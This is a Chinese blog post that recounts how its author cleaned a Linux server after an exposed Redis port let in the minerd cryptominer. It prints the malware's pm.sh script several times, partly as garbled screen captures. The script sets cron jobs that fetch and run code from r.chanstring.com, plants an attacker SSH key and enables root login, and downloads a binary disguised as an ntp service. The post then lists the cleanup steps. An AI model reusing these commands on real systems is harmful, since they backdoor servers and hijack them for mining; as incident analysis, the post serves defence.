linux中了minerd之后的完全清理过程(详解)
程序员文章站
2023-11-20 10:42:52
一不小心装了一个redis服务,开了一个全网的默认端口,一开始以为这台服务器没有公网ip,结果发现之后悔之莫及啊
某天发现cpu load高的出奇,发现一个minerd进...
一不小心装了一个redis服务,开了一个全网的默认端口,一开始以为这台服务器没有公网ip,结果发现之后悔之莫及啊
某天发现cpu load高的出奇,发现一个minerd进程 占了大量cpu,google了一下,发现自己中招了
下面就是清理过程
第一步
1.立即停止redis服务,修改端口权限,增加密码措施
2.按照网上的资料 删除 crontab 里的两个内容
sudo rm /var/spool/cron/root
sudo rm /var/spool/cron/crontabs/root
3.知己知彼,百战不殆,研究病毒的初始话文件
export path=$path:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/10 * * * * curl -fssl http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/10 * * * * curl -fssl http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root
if [ ! -f "/root/.ssh/khk75neoiq" ]; then
mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqczwg/9udowkwwr1zhxb3mtn++94rnitshrewoc9hzfs/f/yw8kghytkviak/ag1xbkbcbdhxwb/tdrzmzf6p+d+ohv4u9nyoyplj53mzb1jpqvj+wz7yeoww/qpjeoxlkn40y5hflu/xre4dybhqv8q/z/sdcvht5fifn+tkez3txl6nqhtz405pd3glwfsj1a/kv9rojf6wl4l3wcrdxu+dm8gspjtuuxxu74iseyjc4b0h1bwdqbbxmvqzlxzzr6k9azpom+ulhzdzqra3sx1y993qhnytbegn+9izcwlhonlepxbro4mxqktvdqkwo0l4ar7xblady7vrnrvfav root" > ~/.ssh/khk75neoiq
echo "permitrootlogin yes" >> /etc/ssh/sshd_config
echo "rsaauthentication yes" >> /etc/ssh/sshd_config
echo "pubkeyauthentication yes" >> /etc/ssh/sshd_config
echo "authorizedkeysfile .ssh/khk75neoiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
"pm.sh" 28l, 1470c 10,1-8 顶端
export path=$path:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/10 * * * * curl -fssl http://r.chanstring.com/pm.sh?0706 | sh" > /var/spooll
/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/10 * * * * curl -fssl http://r.chanstring.com/pm.sh?0706 | sh" > /var/spooll
/cron/crontabs/root
if [ ! -f "/root/.ssh/khk75neoiq" ]; then
mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqczwg/9udowkwwr1zhxb3mtn++94rnitt
shrewoc9hzfs/f/yw8kghytkviak/ag1xbkbcbdhxwb/tdrzmzf6p+d+ohv4u9nyoyplj53mzb1jpqvj+wzz
7yeoww/qpjeoxlkn40y5hflu/xre4dybhqv8q/z/sdcvht5fifn+tkez3txl6nqhtz405pd3glwfsj1a/kvv
9rojf6wl4l3wcrdxu+dm8gspjtuuxxu74iseyjc4b0h1bwdqbbxmvqzlxzzr6k9azpom+ulhzdzqra3sx1yy
993qhnytbegn+9izcwlhonlepxbro4mxqktvdqkwo0l4ar7xblady7vrnrvfav root" > ~/.ssh/khk755
neoiq
echo "permitrootlogin yes" >> /etc/ssh/sshd_config
echo "rsaauthentication yes" >> /etc/ssh/sshd_config
echo "pubkeyauthentication yes" >> /etc/ssh/sshd_config
echo "authorizedkeysfile .ssh/khk75neoiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
10,1-8 顶端
export path=$path:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/10 * * * * curl -fssl http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/rr
oot
mkdir -p /var/spool/cron/crontabs
echo "*/10 * * * * curl -fssl http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/cc
rontabs/root
if [ ! -f "/root/.ssh/khk75neoiq" ]; then
mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqczwg/9udowkwwr1zhxb3mtn++94rnitshrewocc
9hzfs/f/yw8kghytkviak/ag1xbkbcbdhxwb/tdrzmzf6p+d+ohv4u9nyoyplj53mzb1jpqvj+wz7yeoww/qpjeoxll
kn40y5hflu/xre4dybhqv8q/z/sdcvht5fifn+tkez3txl6nqhtz405pd3glwfsj1a/kv9rojf6wl4l3wcrdxu+dm88
gspjtuuxxu74iseyjc4b0h1bwdqbbxmvqzlxzzr6k9azpom+ulhzdzqra3sx1y993qhnytbegn+9izcwlhonlepxbrr
o4mxqktvdqkwo0l4ar7xblady7vrnrvfav root" > ~/.ssh/khk75neoiq
echo "permitrootlogin yes" >> /etc/ssh/sshd_config
echo "rsaauthentication yes" >> /etc/ssh/sshd_config
echo "pubkeyauthentication yes" >> /etc/ssh/sshd_config
echo "authorizedkeysfile .ssh/khk75neoiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
fi
if [ ! -f "/etc/init.d/ntp" ]; then
10,1-8 顶端
export path=$path:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/10 * * * * curl -fssl http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/10 * * * * curl -fssl http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/roo
ot
if [ ! -f "/root/.ssh/khk75neoiq" ]; then
mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqczwg/9udowkwwr1zhxb3mtn++94rnitshrewoc9hzfs/f/yww
8kghytkviak/ag1xbkbcbdhxwb/tdrzmzf6p+d+ohv4u9nyoyplj53mzb1jpqvj+wz7yeoww/qpjeoxlkn40y5hflu/xre4dybhqq
v8q/z/sdcvht5fifn+tkez3txl6nqhtz405pd3glwfsj1a/kv9rojf6wl4l3wcrdxu+dm8gspjtuuxxu74iseyjc4b0h1bwdqbbxx
mvqzlxzzr6k9azpom+ulhzdzqra3sx1y993qhnytbegn+9izcwlhonlepxbro4mxqktvdqkwo0l4ar7xblady7vrnrvfav root""
> ~/.ssh/khk75neoiq
echo "permitrootlogin yes" >> /etc/ssh/sshd_config
echo "rsaauthentication yes" >> /etc/ssh/sshd_config
echo "pubkeyauthentication yes" >> /etc/ssh/sshd_config
echo "authorizedkeysfile .ssh/khk75neoiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
fi
if [ ! -f "/etc/init.d/ntp" ]; then
if [ ! -f "/etc/systemd/system/ntp.service" ]; then
mkdir -p /opt
@
10,1-8 顶端
export path=$path:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/10 * * * * curl -fssl http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/10 * * * * curl -fssl http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root
if [ ! -f "/root/.ssh/khk75neoiq" ]; then
mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqczwg/9udowkwwr1zhxb3mtn++94rnitshrewoc9hzfs/f/yw8kghytkviak/aa
g1xbkbcbdhxwb/tdrzmzf6p+d+ohv4u9nyoyplj53mzb1jpqvj+wz7yeoww/qpjeoxlkn40y5hflu/xre4dybhqv8q/z/sdcvht5fifn+tkez3txll
6nqhtz405pd3glwfsj1a/kv9rojf6wl4l3wcrdxu+dm8gspjtuuxxu74iseyjc4b0h1bwdqbbxmvqzlxzzr6k9azpom+ulhzdzqra3sx1y993qhnyy
tbegn+9izcwlhonlepxbro4mxqktvdqkwo0l4ar7xblady7vrnrvfav root" > ~/.ssh/khk75neoiq
echo "permitrootlogin yes" >> /etc/ssh/sshd_config
echo "rsaauthentication yes" >> /etc/ssh/sshd_config
echo "pubkeyauthentication yes" >> /etc/ssh/sshd_config
echo "authorizedkeysfile .ssh/khk75neoiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
fi
if [ ! -f "/etc/init.d/ntp" ]; then
if [ ! -f "/etc/systemd/system/ntp.service" ]; then
mkdir -p /opt
curl -fssl http://r.chanstring.com/v51/lady_`uname -m` -o /opt/khk75neoiq33 && chmod +x /opt/khk77
5neoiq33 && /opt/khk75neoiq33 -install
fi
fi
10,1-8 顶端
export path=$path:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/10 * * * * curl -fssl http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/10 * * * * curl -fssl http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root
if [ ! -f "/root/.ssh/khk75neoiq" ]; then
mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqczwg/9udowkwwr1zhxb3mtn++94rnitshrewoc9hzfs/f/yw8kghytkviak/ag1xbkbcbdhxwb/tt
drzmzf6p+d+ohv4u9nyoyplj53mzb1jpqvj+wz7yeoww/qpjeoxlkn40y5hflu/xre4dybhqv8q/z/sdcvht5fifn+tkez3txl6nqhtz405pd3glwfsj1a/kv9rojf6ww
l4l3wcrdxu+dm8gspjtuuxxu74iseyjc4b0h1bwdqbbxmvqzlxzzr6k9azpom+ulhzdzqra3sx1y993qhnytbegn+9izcwlhonlepxbro4mxqktvdqkwo0l4ar7xbladd
y7vrnrvfav root" > ~/.ssh/khk75neoiq
echo "permitrootlogin yes" >> /etc/ssh/sshd_config
echo "rsaauthentication yes" >> /etc/ssh/sshd_config
echo "pubkeyauthentication yes" >> /etc/ssh/sshd_config
echo "authorizedkeysfile .ssh/khk75neoiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
fi
if [ ! -f "/etc/init.d/ntp" ]; then
if [ ! -f "/etc/systemd/system/ntp.service" ]; then
mkdir -p /opt
curl -fssl http://r.chanstring.com/v51/lady_`uname -m` -o /opt/khk75neoiq33 && chmod +x /opt/khk75neoiq33 && /opp
t/khk75neoiq33 -install
fi
fi
/etc/init.d/ntp start
ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
10,1-8 顶端
export path=$path:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/10 * * * * curl -fssl http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/10 * * * * curl -fssl http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root
if [ ! -f "/root/.ssh/khk75neoiq" ]; then
mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqczwg/9udowkwwr1zhxb3mtn++94rnitshrewoc9hzfs/f/yw8kghytkviak/ag1xbkbcbdhxwb/tdrzmzf6p+d+ohv4u9nyoyy
plj53mzb1jpqvj+wz7yeoww/qpjeoxlkn40y5hflu/xre4dybhqv8q/z/sdcvht5fifn+tkez3txl6nqhtz405pd3glwfsj1a/kv9rojf6wl4l3wcrdxu+dm8gspjtuuxxu74iseyjc4b0h1bwdqbb
bxmvqzlxzzr6k9azpom+ulhzdzqra3sx1y993qhnytbegn+9izcwlhonlepxbro4mxqktvdqkwo0l4ar7xblady7vrnrvfav root" > ~/.ssh/khk75neoiq
echo "permitrootlogin yes" >> /etc/ssh/sshd_config
echo "rsaauthentication yes" >> /etc/ssh/sshd_config
echo "pubkeyauthentication yes" >> /etc/ssh/sshd_config
echo "authorizedkeysfile .ssh/khk75neoiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
fi
if [ ! -f "/etc/init.d/ntp" ]; then
if [ ! -f "/etc/systemd/system/ntp.service" ]; then
mkdir -p /opt
curl -fssl http://r.chanstring.com/v51/lady_`uname -m` -o /opt/khk75neoiq33 && chmod +x /opt/khk75neoiq33 && /opt/khk75neoiq33 -instaa
ll
fi
fi
/etc/init.d/ntp start
ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9
~
~
~
~
~
10,1-8 全部
export path=$path:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/10 * * * * curl -fssl http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/10 * * * * curl -fssl http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root
if [ ! -f "/root/.ssh/khk75neoiq" ]; then
mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqczwg/9udowkwwr1zhxb3mtn++94rnitshrewoc9hzfs/f/yw8kghytkviak/ag1xbkbcbdhxwb/tdrzmzf6p+d+ohv4u9nyoyplj53mzb1jpqvj+wz77
yeoww/qpjeoxlkn40y5hflu/xre4dybhqv8q/z/sdcvht5fifn+tkez3txl6nqhtz405pd3glwfsj1a/kv9rojf6wl4l3wcrdxu+dm8gspjtuuxxu74iseyjc4b0h1bwdqbbxmvqzlxzzr6k9azpom+ulhzdzqra3sx1y999
3qhnytbegn+9izcwlhonlepxbro4mxqktvdqkwo0l4ar7xblady7vrnrvfav root" > ~/.ssh/khk75neoiq
echo "permitrootlogin yes" >> /etc/ssh/sshd_config
echo "rsaauthentication yes" >> /etc/ssh/sshd_config
echo "pubkeyauthentication yes" >> /etc/ssh/sshd_config
echo "authorizedkeysfile .ssh/khk75neoiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
fi
if [ ! -f "/etc/init.d/ntp" ]; then
if [ ! -f "/etc/systemd/system/ntp.service" ]; then
mkdir -p /opt
curl -fssl http://r.chanstring.com/v51/lady_`uname -m` -o /opt/khk75neoiq33 && chmod +x /opt/khk75neoiq33 && /opt/khk75neoiq33 -install
fi
fi
/etc/init.d/ntp start
ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9
得到结果
1.删除crontab的配置文件,如上我们已经删除,涉及的代码
echo "*/10 * * * * curl -fssl http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo "*/10 * * * * curl -fssl http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root
2.删除 这个是用来免密码登陆的
rm -f ~/.ssh/authorized_keys*
rm -f ~/.ssh/khk75neoiq
你甚至可以直接把.ssh这个目录删除掉
涉及的代码
if [ ! -f "/root/.ssh/khk75neoiq" ]; then
mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqczwg/9udowkwwr1zhxb3mtn++94rnitshrewoc9hzfs/f/yw8kghytkviak/ag1xbkbcbdhxwb/tdrzmzf6p+d+ohv4u9nyoyplj53mzb1jpqvj+wz77
yeoww/qpjeoxlkn40y5hflu/xre4dybhqv8q/z/sdcvht5fifn+tkez3txl6nqhtz405pd3glwfsj1a/kv9rojf6wl4l3wcrdxu+dm8gspjtuuxxu74iseyjc4b0h1bwdqbbxmvqzlxzzr6k9azpom+ulhzdzqra3sx1y999
3qhnytbegn+9izcwlhonlepxbro4mxqktvdqkwo0l4ar7xblady7vrnrvfav root" > ~/.ssh/khk75neoiq
echo "permitrootlogin yes" >> /etc/ssh/sshd_config
echo "rsaauthentication yes" >> /etc/ssh/sshd_config
echo "pubkeyauthentication yes" >> /etc/ssh/sshd_config
echo "authorizedkeysfile .ssh/khk75neoiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
fi
3.删除 /opt/这个目录 这玩意是第四步的服务产生的
4.删除服务
service ntp stop
rm /etc/init.d/ntp
rm /usr/sbin/ntp
涉及的代码
if [ ! -f "/etc/init.d/ntp" ]; then
if [ ! -f "/etc/systemd/system/ntp.service" ]; then
mkdir -p /opt
curl -fssl http://r.chanstring.com/v51/lady_`uname -m` -o /opt/khk75neoiq33 && chmod +x /opt/khk75neoiq33 && /opt/khk75neoiq33 -install
fi
fi
如上的代码,下载了一个8m的程序,是安装了什么东西,楼主也不知道,但是接下来的代码暴露了行踪
/etc/init.d/ntp start
这行代码启动了ntp这个服务,百度搜了下说是个时间服务,其实这玩意是病毒服务,打开这个文件,找到可执行文件/usr/sbin/ntp 发现文件和那个8m的文件一个字节不差
所以删除这个文件
最后
ps aux|grep minerd
kill 掉所有的进程,ok修复结束
半小时之后
ps aux|grep minerd
minerd进程不再出现
以上就是小编为大家带来的linux中了minerd之后的完全清理过程(详解)全部内容了,希望大家多多支持~
下一篇: 上海市大学排名前十名:上海最有实力的大学